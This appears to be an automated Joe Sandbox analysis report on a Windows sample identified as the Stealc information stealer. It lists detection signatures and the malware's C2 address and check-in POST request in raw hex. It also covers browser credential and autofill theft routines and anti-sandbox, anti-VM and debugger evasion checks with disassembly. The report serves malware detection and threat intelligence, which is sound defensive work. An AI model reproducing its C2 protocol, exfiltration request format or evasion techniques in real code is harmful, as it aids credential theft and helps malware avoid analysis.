Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523733
MD5:ff898723c4c693eec7140d101d0066d4
SHA1:3127d0d4a74c0d4f3f05a548a39f2fad684c5cb8
SHA256:61959a4f6720629f28f97cb7341d9ac81fb91c91e97ddc28f9840b6eae8bac58
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FF898723C4C693EEC7140D101D0066D4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2956JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2956JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.990000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T00:37:03.842008+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.990000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0099C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00999AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00999AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00997240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00997240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00999B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00999B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_009A8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0099DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0099E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0099ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F68A FindFirstFileA,0_2_0099F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0099F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0099DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0099BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 36 39 46 30 37 44 34 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 2d 2d 0d 0a Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="hwid"01F69F07D4FC3071859460------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="build"doma------KECBKKEBKEBFCAAAEGDH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00994880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00994880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 36 39 46 30 37 44 34 46 43 33 30 37 31 38 35 39 34 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 2d 2d 0d 0a Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="hwid"01F69F07D4FC3071859460------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="build"doma------KECBKKEBKEBFCAAAEGDH--
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/2
                Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2090478959.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=k
                Source: file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpDH

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E70_2_00CE58E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A8990_2_00C0A899
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D288660_2_00D28866
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6203A0_2_00D6203A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5D02B0_2_00D5D02B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D671FC0_2_00D671FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C412FA0_2_00C412FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5EA730_2_00D5EA73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C27F0_2_00D6C27F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C14BD50_2_00C14BD5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D72B850_2_00D72B85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF233E0_2_00CF233E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DC820_2_00D6DC82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D59C030_2_00D59C03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4BEDE0_2_00C4BEDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6AEB10_2_00D6AEB1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D656500_2_00D65650
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5B65D0_2_00D5B65D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D397F50_2_00D397F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1C7370_2_00D1C737
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009945C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: yvmyyuzz ZLIB complexity 0.9950593703976436
                Source: file.exe, 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_009A8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_009A3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0352QAC9.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT name, value FROM autofill;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1894400 > 1048576
                Source: file.exeStatic PE information: Raw size of yvmyyuzz is bigger than: 0x100000 < 0x1a8600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.990000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yvmyyuzz:EW;loyfpxav:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yvmyyuzz:EW;loyfpxav:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d28f6 should be: 0x1d7de7
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: yvmyyuzz
                Source: file.exeStatic PE information: section name: loyfpxav
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFF8F8 push ecx; mov dword ptr [esp], 1571F95Dh0_2_00DFF81F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFF8F8 push eax; mov dword ptr [esp], 7B5547DBh0_2_00DFF8C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFF8F8 push 0BDACE33h; mov dword ptr [esp], ebx0_2_00DFF91B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E7 push ebp; mov dword ptr [esp], eax0_2_00CE58EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E7 push esi; mov dword ptr [esp], edx0_2_00CE5902
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E7 push ecx; mov dword ptr [esp], edi0_2_00CE5979
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E7 push 4AEB3A27h; mov dword ptr [esp], edx0_2_00CE5A42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE58E7 push 04CBA347h; mov dword ptr [esp], eax0_2_00CE5A51
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D910E1 push edx; mov dword ptr [esp], eax0_2_00D910FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push edx; mov dword ptr [esp], ebx0_2_00C2C169
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push ebx; mov dword ptr [esp], esp0_2_00C2C198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push esi; mov dword ptr [esp], 76658547h0_2_00C2C1E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push edi; mov dword ptr [esp], 7DCBA8DEh0_2_00C2C1EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push 770DD9BCh; mov dword ptr [esp], ecx0_2_00C2C26E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push edx; mov dword ptr [esp], ecx0_2_00C2C29F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2C0FD push 3789DBACh; mov dword ptr [esp], edx0_2_00C2C2F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9A899 push 4700DA2Bh; mov dword ptr [esp], edi0_2_00D9A8B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9A899 push edi; mov dword ptr [esp], esp0_2_00D9A8D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE389E push ecx; mov dword ptr [esp], eax0_2_00DE3946
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A899 push 7941ABA2h; mov dword ptr [esp], edx0_2_00C0A8CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A899 push 231B453Ah; mov dword ptr [esp], eax0_2_00C0A941
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A899 push 4BF99C17h; mov dword ptr [esp], ebx0_2_00C0A949
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A899 push 46CA99A3h; mov dword ptr [esp], ecx0_2_00C0A9B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E16081 push edx; mov dword ptr [esp], ecx0_2_00E16085
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E16081 push eax; mov dword ptr [esp], ecx0_2_00E16111
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E16081 push edx; mov dword ptr [esp], esp0_2_00E1611A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1488C push 57E1866Ah; mov dword ptr [esp], edx0_2_00E148F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1488C push eax; mov dword ptr [esp], esi0_2_00E14933
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AB035 push ecx; ret 0_2_009AB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D28866 push eax; mov dword ptr [esp], ecx0_2_00D288DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D28866 push 7461E651h; mov dword ptr [esp], edx0_2_00D288E7
                Source: file.exeStatic PE information: section name: yvmyyuzz entropy: 7.954108678266825

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13659
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF202F second address: BF18FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F3A30BBDF8Dh 0x0000000a nop 0x0000000b add dword ptr [ebp+122D2C14h], eax 0x00000011 push dword ptr [ebp+122D0A61h] 0x00000017 add dword ptr [ebp+122D19EEh], eax 0x0000001d call dword ptr [ebp+122D17F3h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2552h], ebx 0x0000002a xor eax, eax 0x0000002c clc 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 mov dword ptr [ebp+122D2552h], eax 0x00000037 mov dword ptr [ebp+122D2997h], eax 0x0000003d pushad 0x0000003e mov ecx, dword ptr [ebp+122D27C7h] 0x00000044 add ecx, dword ptr [ebp+122D291Fh] 0x0000004a popad 0x0000004b mov esi, 0000003Ch 0x00000050 mov dword ptr [ebp+122D2552h], ecx 0x00000056 ja 00007F3A30BBDF94h 0x0000005c jmp 00007F3A30BBDF8Eh 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 cld 0x00000066 lodsw 0x00000068 jmp 00007F3A30BBDF90h 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F3A30BBDF93h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b mov dword ptr [ebp+122D2552h], eax 0x00000081 mov esi, edi 0x00000083 popad 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F3A30BBDF91h 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF18FF second address: BF1904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59732 second address: D59738 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77CFD second address: D77D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
